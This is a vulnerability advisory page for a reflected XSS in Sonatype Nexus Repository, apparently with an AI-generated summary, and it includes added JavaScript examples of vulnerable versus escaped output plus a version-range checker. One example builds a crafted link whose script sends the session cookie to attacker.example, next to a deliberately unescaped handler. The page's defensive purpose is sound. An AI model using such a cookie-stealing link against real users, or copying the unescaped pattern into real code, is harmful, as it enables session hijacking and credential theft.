CVE-2026-3438
Description
A reflected cross-site scripting vulnerability exists in Sonatype Nexus Repository versions 3.0.0 through 3.90.2 that allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser through a specially crafted URL. Exploitation requires user interaction.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Sonatype Nexus Repository 3.0.0–3.90.2 contains a reflected XSS flaw allowing unauthenticated remote attackers to execute arbitrary JavaScript via crafted URLs.
Vulnerability
Overview
A reflected cross-site scripting (XSS) vulnerability exists in Sonatype Nexus Repository versions 3.0.0 through 3.90.2. An unauthenticated remote attacker who tricks a user into opening a specially crafted URL can cause arbitrary JavaScript to run in that user's browser session with the Nexus Repository application. The root cause is insufficient sanitization of user-supplied input that the server reflects into its HTTP responses [1].
Exploitation
Prerequisites
Exploitation requires user interaction—the victim must click or otherwise open the malicious link. No authentication is needed to trigger the vulnerability, and the attack can be carried out over the network. The crafted URL can be delivered via phishing emails, forum posts, or other social engineering vectors [1].
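The reflection pattern described above, shown as an added illustration that is not Nexus Repository code and does not reproduce the actual vulnerable endpoint: a handler echoes a query parameter into an HTML page once without escaping and once with HTML escaping, and a crude check looks for active content in the result. The route `/search`, the parameter name `q`, the page template and the crafted link are all assumptions constructed for this example.

```javascript
// Added example of a reflected XSS and its fix. Not Sonatype code; the route,
// parameter name and template are hypothetical.

// Escape the characters that matter when untrusted text lands in HTML element
// content (assumption: the reflection point is element content, not an
// attribute, URL or script context, which each need their own encoding).
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Pull one query parameter out of a request URL; Node's WHATWG URL parser
// percent-decodes it, which is exactly what a browser-sent link looks like server-side.
function getQueryParam(requestUrl, name) {
  return new URL(requestUrl, "http://localhost").searchParams.get(name) ?? "";
}

// Vulnerable form: the raw parameter is interpolated straight into the markup,
// so any '<' or '>' the attacker puts in the link becomes part of the DOM.
function renderVulnerable(requestUrl) {
  const q = getQueryParam(requestUrl, "q");
  return `<html><body><p>No results for: ${q}</p></body></html>`;
}

// Hardened form: same page, same parameter, escaped before reflection.
function renderHardened(requestUrl) {
  const q = getQueryParam(requestUrl, "q");
  return `<html><body><p>No results for: ${escapeHtml(q)}</p></body></html>`;
}

// Check used only by this example: does the response contain a script element
// or an inline event handler? The template itself has neither.
function containsActiveContent(html) {
  return /<script\b|\bon[a-z]+\s*=/i.test(html);
}

// Constructed crafted link, percent-encoded the way it would be pasted into a
// phishing mail; the payload sends the session cookie to an attacker host.
const CRAFTED_LINK =
  "/search?q=%3Cscript%3Edocument.location%3D%27https%3A%2F%2Fattacker.example%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E";

function demo() {
  return {
    vulnerable: containsActiveContent(renderVulnerable(CRAFTED_LINK)),
    hardened: containsActiveContent(renderHardened(CRAFTED_LINK)),
  };
}

console.log(demo()); // { vulnerable: true, hardened: false }
```

The point of the pair is that the fix is output encoding at the reflection point, chosen for the context the value lands in; stripping `<script>` from the input is not a substitute, and a strict Content-Security-Policy only limits what an injected script can do rather than preventing the injection.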
Impact
Successful exploitation lets the attacker execute arbitrary JavaScript in the context of the victim's browser session with the Nexus Repository application. Depending on the payload and on the victim's privileges within the repository, this can lead to session hijacking, credential theft, defacement, or redirection to malicious sites [1].
Mitigation
Sonatype addressed this vulnerability in Nexus Repository version 3.91.0, released on April 7, 2026. Users are strongly advised to upgrade to 3.91.0 or later. No workarounds have been published for unpatched versions [1].
AI Insight generated on May 18, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
Range: >=3.0.0 <=3.90.2
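A check a practitioner can run against the range above, added here and not a Sonatype tool: compare an installed Nexus Repository version numerically against the affected bounds on this page. The bounds are taken from the page; the assumption that Nexus version strings may carry a `-NN` build suffix (as in `3.90.2-01`), which the parser ignores, and the way you obtain the string (the UI, the logs, or a response header) are yours to confirm for your deployment.

```javascript
// Added example: numeric version-range check for this CVE. Not Sonatype code.

// Bounds as stated on this page.
const AFFECTED_MIN = "3.0.0";
const AFFECTED_MAX = "3.90.2";
const FIXED_IN = "3.91.0";

// Parse "MAJOR.MINOR.PATCH" with an optional leading "v" and an optional
// trailing build suffix such as "-01" (assumption about Nexus version strings).
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)(?:-\d+)?$/.exec(String(v).trim());
  if (!m) throw new Error(`unrecognised version string: ${v}`);
  return [Number(m[1]), Number(m[2]), Number(m[3])];
}

// Component-wise comparison. A plain string comparison would be wrong here:
// "3.9.0" < "3.90.2" lexicographically but 3.9 is far older than 3.90.
function compareVersions(a, b) {
  const x = parseVersion(a);
  const y = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    if (x[i] !== y[i]) return x[i] < y[i] ? -1 : 1;
  }
  return 0;
}

function isAffected(version) {
  return compareVersions(version, AFFECTED_MIN) >= 0 &&
         compareVersions(version, AFFECTED_MAX) <= 0;
}

// Human-readable verdict for a fleet report.
function verdict(version) {
  return isAffected(version)
    ? `${version}: AFFECTED by CVE-2026-3438, upgrade to ${FIXED_IN} or later`
    : `${version}: not in affected range`;
}

// Constructed sample inventory; build suffixes are illustrative.
const SAMPLE_INVENTORY = ["3.90.2-01", "3.91.0-01", "3.0.0-01", "3.9.0-01", "2.14.20-02"];

for (const v of SAMPLE_INVENTORY) console.log(verdict(v));
```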
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
News mentions
No linked articles in our index yet.